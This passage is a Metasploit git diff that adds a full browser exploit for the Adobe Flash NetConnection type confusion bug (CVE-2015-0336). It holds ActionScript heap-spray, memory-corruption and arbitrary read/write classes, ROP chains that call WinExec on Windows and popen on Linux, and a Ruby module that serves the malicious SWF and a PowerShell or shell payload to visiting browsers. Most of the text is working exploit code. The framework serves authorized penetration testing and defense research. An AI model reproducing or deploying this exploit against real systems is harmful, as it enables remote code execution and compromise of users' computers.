spray[i][0] = 0xdeadbeef + spray[i][1] = 0xdeedbeef + spray[i][2] = i + spray[i][29] = 0x1a1e1429 + } + + for(i = 0; i < 89698; i = i + 1) { + spray[i].length = 0x1e + } + } else if (platform == 'linux') { + for (i = 0; i < 89698; i = i + 1) { + spray[i] = new Vector.(1022) + spray[i][0] = 0xdeadbeef + spray[i][1] = 0xdeedbeef + spray[i][2] = i + spray[i][29] = 0x956c1490 // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021 + spray[i][39] = 1 // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58 + spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted) + } + } + + var trigger_byte_array:ByteArray = createByteArray(trigger_swf) + trigger_byte_array.endian = Endian.LITTLE_ENDIAN + trigger_byte_array.position = 0 + // Trigger corruption + var trigger_loader:Loader = new Loader() + trigger_loader.loadBytes(trigger_byte_array) + + interval_id = setTimeout(do_exploit, 2000) + } + + + private function createByteArray(hex_string:String) : ByteArray { + var byte:String + var byte_array:ByteArray = new ByteArray() + var hex_string_length:uint = hex_string.length + var i:uint = 0 + while(i < hex_string_length) + { + byte = hex_string.charAt(i) + hex_string.charAt(i + 1) + byte_array.writeByte(parseInt(byte,16)) + i = i + 2 + } + return byte_array + } + + private function do_exploit():void { + clearTimeout(interval_id) + + for(var i:uint = 0; i < spray.length; i = i + 1) { + if (spray[i].length != 1022 && spray[i].length != 0x1e) { + Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16)) + spray[i][0x3ffffffe] = 0xffffffff + spray[i][0x3fffffff] = spray[i][1023] + uv = spray[i] + } + } + + for(i = 0; i < spray.length; i = i + 1) { + if (spray[i].length == 1022 || spray[i].length == 0x1e) { + spray[i] = null + } + } + + if (uv == null || uv.length != 0xffffffff) { + return + } + + exploiter = new Exploiter(this, platform, payload, uv) + } + } +} + diff --git a/external/source/exploits/CVE-2015-0336/ExploitByteArray.as b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as new file mode 100644 index 0000000000..0da3b307b4 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as @@ -0,0 +1,82 @@ +package +{ + import flash.utils.ByteArray + + public class ExploitByteArray + { + private const MAX_STRING_LENGTH:uint = 100 + public var ba:ByteArray + public var original_length:uint + private var platform:String + + public function ExploitByteArray(p:String, l:uint = 1024) + { + ba = new ByteArray() + ba.length = l + ba.endian = "littleEndian" + ba.writeUnsignedInt(0) + platform = p + original_length = l + } + + public function set_length(length:uint):void + { + ba.length = length + } + + public function get_length():uint + { + return ba.length + } + + public function lets_ready():void + { + Logger.log("[*] ExploitByteArray - lets_ready()") + ba.endian = "littleEndian" + if (platform == "linux") { + ba.length = 0xffffffff + } + } + + public function is_ready():Boolean + { + Logger.log("[*] ExploitByteArray - is_ready() - 0x" + ba.length.toString(16)) + if (ba.length == 0xffffffff) + return true + + return false + } + + public function read(addr:uint, type:String = "dword"):uint + { + ba.position = addr + switch(type) { + case "dword": + return ba.readUnsignedInt() + case "word": + return ba.readUnsignedShort() + case "byte": + return ba.readUnsignedByte() + } + return 0 + } + + public function read_string(addr:uint, length:uint = 0):String + { + ba.position = addr + if (length == 0) + return ba.readUTFBytes(MAX_STRING_LENGTH) + else + return ba.readUTFBytes(length) + } + + public function write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) ba.position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) + if (zero) ba.writeByte(0) + } else ba.writeUnsignedInt(value) + } + } +} diff --git a/external/source/exploits/CVE-2015-0336/ExploitVector.as b/external/source/exploits/CVE-2015-0336/ExploitVector.as new file mode 100644 index 0000000000..3d9c84b43b --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/ExploitVector.as @@ -0,0 +1,74 @@ +package +{ + public class ExploitVector + { + private var uv:Vector. + public var original_length:uint = 0x3e0 + + public function ExploitVector(v:Vector.) + { + uv = v + } + + public function restore():void + { + uv[0x3ffffffe] = original_length + } + + public function is_ready():Boolean + { + if (uv.length > original_length) + { + return true + } + return false + } + + public function at(pos:uint):uint + { + return uv[pos] + } + + // pos: position where a Vector.[0] lives + public function set_own_address(pos:uint):void + { + uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc + } + + public function read(addr:uint):uint + { + var pos:uint = 0 + + if (addr > uv[0]) { + pos = ((addr - uv[0]) / 4) - 2 + } else { + pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1 + } + + return uv[pos] + } + + public function write(addr:uint, value:uint = 0):void + { + var pos:uint = 0 + + if (addr > uv[0]) { + pos = ((addr - uv[0]) / 4) - 2 + } else { + pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1 + } + + uv[pos] = value + } + + public function search_pattern(pattern:uint, limit:uint):uint + { + for (var i:uint = 0; i < limit/4; i++) { + if (uv[i] == pattern) { + return i + } + } + throw new Error() + } + } +} diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as new file mode 100644 index 0000000000..036ffceb04 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/Exploiter.as @@ -0,0 +1,251 @@ +package +{ + import flash.utils.ByteArray + import flash.system.System + + public class Exploiter + { + private const VECTOR_OBJECTS_LENGTH:uint = 1014 + private var exploit:Exploit + private var ev:ExploitVector + private var eba:ExploitByteArray + private var payload:String + private var platform:String + private var pos:uint + private var byte_array_object:uint + private var main:uint + private var stack_object:uint + private var payload_space_object:uint + private var buffer_object:uint + private var buffer:uint + private var vtable:uint + private var stack_address:uint + private var payload_address:uint + private var stack:Vector. = new Vector.(0x6400) + private var payload_space:Vector. = new Vector.(0x6400) + private var spray:Vector. = new Vector.(89698) + + public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.):void + { + exploit = exp + payload = p + platform = pl + + ev = new ExploitVector(uv) + if (!ev.is_ready()) return + eba = new ExploitByteArray(platform) + spray_objects() + try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; } + ev.set_own_address(pos) + if (!disclose_objects()) { ev.restore(); cleanup(); return; } + disclose_addresses() + corrupt_byte_array() + if (!eba.is_ready()) { ev.restore(); cleanup(); return } + do_rop() + restore_byte_array() + ev.restore() + cleanup() + } + + private function spray_objects():void + { + Logger.log("[*] Exploiter - spray_objects()") + for (var i:uint = 0; i < spray.length; i++) + { + spray[i] = new Vector.(VECTOR_OBJECTS_LENGTH) + spray[i][0] = eba.ba + spray[i][1] = exploit + spray[i][2] = stack + spray[i][3] = payload_space + } + } + + private function search_objects():uint + { + Logger.log("[*] Exploiter - search_objects()") + var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x4000) + return idx + 1 + } + + private function disclose_objects():Boolean + { + Logger.log("[*] Exploiter - disclose_objects()") + byte_array_object = ev.at(pos) - 1 + main = ev.at(pos + 1) - 1 + stack_object = ev.at(pos + 2) - 1 + payload_space_object = ev.at(pos + 3) - 1 + if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) { + return false + } + return true + } + + private function disclose_addresses():void + { + Logger.log("[*] Exploiter - disclose_addresses()") + if (platform == "linux") + { + buffer_object = ev.read(byte_array_object + 0x10) + buffer = ev.read(buffer_object + 0x1c) + } + else if (platform == "win") + { + buffer_object = ev.read(byte_array_object + 0x40) + buffer = ev.read(buffer_object + 8) + } + vtable = ev.read(main) + stack_address = ev.read(stack_object + 0x18) + payload_address = ev.read(payload_space_object + 0x18) + } + + private function corrupt_byte_array():void + { + Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform) + if (platform == "linux") + { + ev.write(buffer_object + 0x1c) // *array + ev.write(buffer_object + 0x20, 0xffffffff) // capacity + } + else if (platform == "win") + { + ev.write(buffer_object + 8) // *array + ev.write(buffer_object + 16, 0xffffffff) // capacity + } + eba.lets_ready() + } + + private function restore_byte_array():void + { + Logger.log("[*] Exploiter - restore_byte_array(): " + platform) + if (platform == "linux") + { + ev.write(buffer_object + 0x1c, buffer) // *array + ev.write(buffer_object + 0x20, 1024) // capacity + } + else if (platform == "win") + { + ev.write(buffer_object + 8, buffer) // *array + ev.write(buffer_object + 16, 1024) // capacity + } + eba.set_length(eba.original_length) + } + + private function do_rop():void + { + Logger.log("[*] Exploiter - do_rop()") + if (platform == "linux") + do_rop_linux() + else if (platform == "win") + do_rop_windows() + else + return + } + + private function do_rop_windows():void + { + Logger.log("[*] Exploiter - do_rop_windows()") + var pe:PE = new PE(eba) + var flash:uint = pe.base(vtable) + var winmm:uint = pe.module("winmm.dll", flash) + var kernel32:uint = pe.module("kernel32.dll", winmm) + var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32) + var winexec:uint = pe.procedure("WinExec", kernel32) + var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash) + var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash) + + // Continuation of execution + eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable + eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main + eba.write(0, "\x89\x03", false) // mov [ebx], eax + eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + // Put the payload (command) in memory + eba.write(payload_address + 8, payload, true); // payload + + // Put the fake vtabe / stack on memory + eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability... + eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h] + eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot + eba.write(0, virtualprotect) + + // VirtualProtect + eba.write(0, winexec) + eba.write(0, buffer + 0x10) + eba.write(0, 0x1000) + eba.write(0, 0x40) + eba.write(0, buffer + 0x8) // Writable address (4 bytes) + + // WinExec + eba.write(0, buffer + 0x10) + eba.write(0, payload_address + 8) + eba.write(0) + + eba.write(main, stack_address + 0x18000) // overwrite with fake vtable + exploit.toString() // call method in the fake vtable + } + + private function do_rop_linux():void + { + Logger.log("[*] Exploiter - do_rop_linux()") + var flash:Elf = new Elf(eba, vtable) + var feof:uint = flash.external_symbol('feof') + var libc:Elf = new Elf(eba, feof) + var popen:uint = libc.symbol("popen") + var mprotect:uint = libc.symbol("mprotect") + var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff) + var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff) + var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff) + + // Continuation of execution + // 1) Recover original vtable + eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable + eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main + eba.write(0, "\x89\x03", false) // mov [ebx], eax + // 2) Recover original stack + eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi + + // Put the popen parameters in memory + eba.write(payload_address + 8, 'r', true) // type + eba.write(payload_address + 0xc, payload, true) // command + + // Put the fake stack/vtable on memory + eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot + eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi + eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024 + + // Return to mprotect() + eba.write(stack_address + 0x18034, mprotect) + // Return to stackpivot (jmp over mprotect parameters) + eba.write(0, addesp2cret) + // mprotect() arguments + eba.write(0, buffer) // addr + eba.write(0, 0x1000) // size + eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC + // Return to popen() + eba.write(stack_address + 0x18068, popen) + // Return to CoE (fix stack and object vtable) + eba.write(0, buffer + 0x10) + // popen() argument + eba.write(0, payload_address + 0xc) + eba.write(0, payload_address + 8) + + //call DWORD PTR [eax+0x24] + //EAX: 0x41414141 ('AAAA') + //EDI: 0xad857088 ("AAAA\377") + eba.write(main, stack_address + 0x18000) + exploit.hasOwnProperty('msf') + } + + private function cleanup():void + { + Logger.log("[*] Exploiter - cleanup()") + spray = null + stack = null + payload_space = null + eba = null + ev = null + exploit = null + System.pauseForGCIfCollectionImminent(0) + } + } +} diff --git a/external/source/exploits/CVE-2015-0336/Logger.as b/external/source/exploits/CVE-2015-0336/Logger.as new file mode 100644 index 0000000000..16c0447973 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/Logger.as @@ -0,0 +1,32 @@ +package +{ + import flash.external.ExternalInterface + + public class Logger { + private static const DEBUG:uint = 0 + + public static function alert(msg:String):void + { + var str:String = ""; + + if (DEBUG == 1) + str += msg; + + if(ExternalInterface.available){ + ExternalInterface.call("alert", str); + } + } + + public static function log(msg:String):void + { + var str:String = ""; + + if (DEBUG == 1) + str += msg; + + if(ExternalInterface.available){ + ExternalInterface.call("console.log", str); + } + } + } +} diff --git a/external/source/exploits/CVE-2015-0336/Msf.as b/external/source/exploits/CVE-2015-0336/Msf.as deleted file mode 100755 index fee7a99e95..0000000000 --- a/external/source/exploits/CVE-2015-0336/Msf.as +++ /dev/null @@ -1,321 +0,0 @@ -// Build how to: -// 1. Download the AIRSDK, and use its compiler. -// 2. Download the Flex SDK (4.6) -// 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) -// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) -// 4. Build with: mxmlc -o msf.swf Msf.as - -// It uses original code from @hdarwin89 for exploitation using ba's and vectors - -package -{ - import flash.utils.* - import flash.display.* - import flash.system.* - import mx.utils.Base64Decoder - - public final class Msf extends Sprite { - private var interval_id:uint; - - private var trigger_swf:String = "" - - private var b64:Base64Decoder = new Base64Decoder(); - private var payload:String = "" - - private var spray:Vector. = new Vector.(89698 + 100) - private var corrupted_index:uint = 0 - private var restore_required:Boolean = false - - private var uv:Vector. - private var ba:ByteArray = new ByteArray() - private var stack:Vector. = new Vector.(0x6400) - private var payload_space:Vector. = new Vector.(0x6400) - - public function Msf() { - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - payload = b64.toByteArray().toString() - trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr - - ba.endian = "littleEndian" - ba.length = 1024 - ba.writeUnsignedInt(0xdeedbeef) - ba.position = 0 - - var i:uint = 0 - - while (i < 89698) { - spray[i] = new Vector.(1014) - spray[i][0] = 0xdeadbeef - spray[i][1] = 0xdeedbeef - spray[i][2] = i - spray[i][29] = 0x1a1e1429 - i++ - } - - for(i = 0; i < 89698; i = i + 1) { - spray[i].length = 0x1e - } - - for(i = 0; i < 100; i = i + 1) { - spray[i + 89698] = new Vector.(1014) - spray[i + 89698][0] = ba - spray[i + 89698][1] = this - spray[i + 89698][2] = stack - spray[i + 89698][3] = payload_space - } - - for(i = 0; i < 100; i = i + 1) { - spray[i + 89698].length = 114 - } - - var trigger_byte_array:ByteArray = createByteArray(trigger_swf) - trigger_byte_array.endian = Endian.LITTLE_ENDIAN - trigger_byte_array.position = 0 - - // Trigger corruption - var trigger_loader:Loader = new Loader(); - trigger_loader.loadBytes(trigger_byte_array); - - interval_id = setTimeout(exploit, 2000) - } - - public function createByteArray(hex_string:String) : ByteArray { - var byte:String = null; - var byte_array:ByteArray = new ByteArray(); - var hex_string_length:uint = hex_string.length; - var i:uint = 0; - while(i < hex_string_length) - { - byte = hex_string.charAt(i) + hex_string.charAt(i + 1); - byte_array.writeByte(parseInt(byte,16)); - i = i + 2; - } - return byte_array; - } - - public function exploit():void { - clearTimeout(interval_id) - - for(var i:uint = 0; i < spray.length; i = i + 1) { - if (spray[i].length != 0x1e) { - corrupted_index = corrupt_vector_uint(i) - restore_required = true - uv = spray[corrupted_index] - uv[0] = 0x1a1e3000 // We're being confident about the spray for exploitation anyway :-) - control_execution() - if (restore_required) { - restore_vector_uint() - } - break; - } - } - } - - // make it better, search and return error if it doesn't work :-) - public function corrupt_vector_uint(index:uint):uint { - spray[index][0x3fe] = 0xffffffff - return spray[index][0x402] - } - - public function restore_vector_uint():void { - var atom:uint = spray[corrupted_index][0x3fffffff] - spray[corrupted_index][0x3ffffbff] = atom - spray[corrupted_index][0x3ffffbfe] = 0x1e - // Restore vector corrupted by hand - spray[corrupted_index][0x3ffffffe] = 0x1e - } - - public function control_execution():void { - // Use the corrupted Vector to search saved addresses - var object_vector_pos:uint = search_object_vector() - if (object_vector_pos == 0xffffffff) { - return - } - - var byte_array_object:uint = uv[object_vector_pos] - 1 - var main:uint = uv[object_vector_pos + 1] - 1 - var stack_object:uint = uv[object_vector_pos + 2] - 1 - var payload_space_object:uint = uv[object_vector_pos + 3] - 1 - - // Use the corrupted Vector to disclose arbitrary memory - var buffer_object:uint = vector_read(byte_array_object + 0x40) - var buffer:uint = vector_read(buffer_object + 8) - var stack_address:uint = vector_read(stack_object + 0x18) - var payload_address:uint = vector_read(payload_space_object + 0x18) - var vtable:uint = vector_read(main) - - // Set the new ByteArray length - ba.endian = "littleEndian" - ba.length = 0x500000 - - // Overwite the ByteArray data pointer and capacity - var ba_array:uint = buffer_object + 8 - var ba_capacity:uint = buffer_object + 16 - vector_write(ba_array) - vector_write(ba_capacity, 0xffffffff) - - // restoring the corrupted vector length since we don't need it anymore - restore_vector_uint() - restore_required = false - - var flash:uint = base(vtable) - var winmm:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", winmm) - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - // Continuation of execution - byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - // Put the payload (command) in memory - byte_write(payload_address + 8, payload, true); // payload - - // Put the fake vtabe / stack on memory - byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability... - byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h] - byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x10) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x8) // Writable address (4 bytes) - - // WinExec - byte_write(0, buffer + 0x10) - byte_write(0, payload_address + 8) - byte_write(0) - - byte_write(main, stack_address + 0x18000) // overwrite with fake vtable - - toString() // call method in the fake vtable - } - - private function search_object_vector():uint { - var i:uint = 0; - while (i < 89698 * 1024){ - if (uv[i] == 114) { - return i + 1; - } - i++ - } - return 0xffffffff - } - - // Methods to use the corrupted uint vector - - private function vector_write(addr:uint, value:uint = 0):void - { - var pos:uint = 0 - - if (addr > uv[0]) { - pos = ((addr - uv[0]) / 4) - 2 - } else { - pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1 - } - - uv[pos] = value - } - - private function vector_read(addr:uint):uint - { - var pos:uint = 0 - - if (addr > uv[0]) { - pos = ((addr - uv[0]) / 4) - 2 - } else { - pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1 - } - - return uv[pos] - } - - // Methods to use the corrupted byte array for arbitrary reading/writing - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) ba.position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) - if (zero) ba.writeByte(0) - } else ba.writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - ba.position = addr - switch(type) { - case "dword": - return ba.readUnsignedInt() - case "word": - return ba.readUnsignedShort() - case "byte": - return ba.readUnsignedByte() - } - return 0 - } - - // Methods to search the memory with the corrupted byte array - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) - var i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - ba.position = addr + entry - var dll_name:String = ba.readUTFBytes(name.length).toUpperCase(); - if (dll_name == name.toUpperCase()) { - break; - } - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))); - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - ba.position = addr + entry - if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } - } -} diff --git a/external/source/exploits/CVE-2015-0336/PE.as b/external/source/exploits/CVE-2015-0336/PE.as new file mode 100644 index 0000000000..a80ade9321 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/PE.as @@ -0,0 +1,63 @@ +package +{ + public class PE + { + private var eba:ExploitByteArray + + public function PE(ba:ExploitByteArray) + { + eba = ba + } + + public function base(addr:uint):uint + { + Logger.log("[*] PE - base(): searching base for 0x" + addr.toString(16)) + addr &= 0xffff0000 + while (true) { + if (eba.read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + public function module(name:String, addr:uint):uint + { + var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1 + var mod_name:String + + while (true) { + var entry:uint = eba.read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + mod_name = eba.read_string(addr + entry, name.length) + if (mod_name.toUpperCase() == name.toUpperCase()) break + } + return base(eba.read(addr + eba.read(iat + i * 0x14 + 16))) + } + + public function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78) + var numberOfNames:uint = eba.read(eat + 0x18) + var addressOfFunctions:uint = addr + eba.read(eat + 0x1c) + var addressOfNames:uint = addr + eba.read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24) + var proc_name:String + + for (var i:uint = 0; ; i++) { + var entry:uint = eba.read(addressOfNames + i * 4) + proc_name = eba.read_string(addr + entry, name.length + 2) + if (proc_name.toUpperCase() == name.toUpperCase()) break + } + return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + public function gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (eba.read(addr + i) & hint)) break + return addr + i + } + } +} diff --git a/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj b/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj new file mode 100755 index 0000000000..579960bd86 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj @@ -0,0 +1,60 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as b/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as new file mode 100755 index 0000000000..8dbada53c8 --- /dev/null +++ b/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as @@ -0,0 +1,18 @@ +// Build with FlashDevelop, its command line is: +// fdbuild.exe "Trigger.as2proj" -ipc 22ef73b0-fe1e-4cd0-8363-4650575d43b6 -version "1.14" -compiler "C:\Program Files\FlashDevelop\Tools\mtasc" -notrace -library "C:\Program Files\FlashDevelop\Library" +class Main +{ + public static function main(swfRoot:MovieClip):Void + { + var _loc2_ = _global.ASnative(2100, 0x956c2000); + var _loc3_ = new Object(); + _loc2_.__proto__ = _loc3_; + _global.ASnative(2100, 200)(_loc3_); //Netconnection constructor + _global.ASnative(2100, 8).apply(_loc2_, [1]); //NetConnection.farID + } + + public function Main() + { + } + +} \ No newline at end of file diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb new file mode 100644 index 0000000000..04360a9b08 --- /dev/null +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player NetConnection Type Confusion', + 'Description' => %q{ + This module exploits a type confusion vulnerability in the NetConnection class on + Adobe Flash Player. When using a correct memory layout this vulnerability allows + to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like + vectors, and finally accomplish remote code execution. This module has been tested + successfully on: + * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305 + * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Adobe Flash 11.2.202.404 + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit + 'Unknown', # Exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0336'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'], + ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'], + ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'], + ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['win', 'unix'], + 'Arch' => [ARCH_X86, ARCH_CMD], + 'BrowserRequirements' => + { + :source => /script|headers/i, + :arch => ARCH_X86, + :os_name => lambda do |os| + os =~ OperatingSystems::Match::LINUX || + os =~ OperatingSystems::Match::WINDOWS_7 + end, + :ua_name => lambda do |ua| + case target.name + when 'Windows' + return true if ua == Msf::HttpClients::IE + when 'Linux' + return true if ua == Msf::HttpClients::FF + end + + false + end, + :flash => lambda do |ver| + case target.name + when 'Windows' + return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') + when 'Linux' + return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.442') + end + + false + end + }, + 'Targets' => + [ + [ 'Windows', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ], + [ 'Linux', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 12 2015', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + @trigger = create_trigger + + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + + if target.name =~ /Windows/ + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + platform_id = 'win' + elsif target.name =~ /Linux/ + target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD)) + b64_payload = Rex::Text.encode_base64(target_payload) + platform_id = 'linux' + end + + trigger_hex_stream = @trigger.unpack('H*')[0] + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + + def create_trigger + if target.name =~ /Linux/ + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger_linux.swf') + else + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf') + end + + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end +end diff --git a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb index 9d5fb19f54..3bcb6a7130 100644 --- 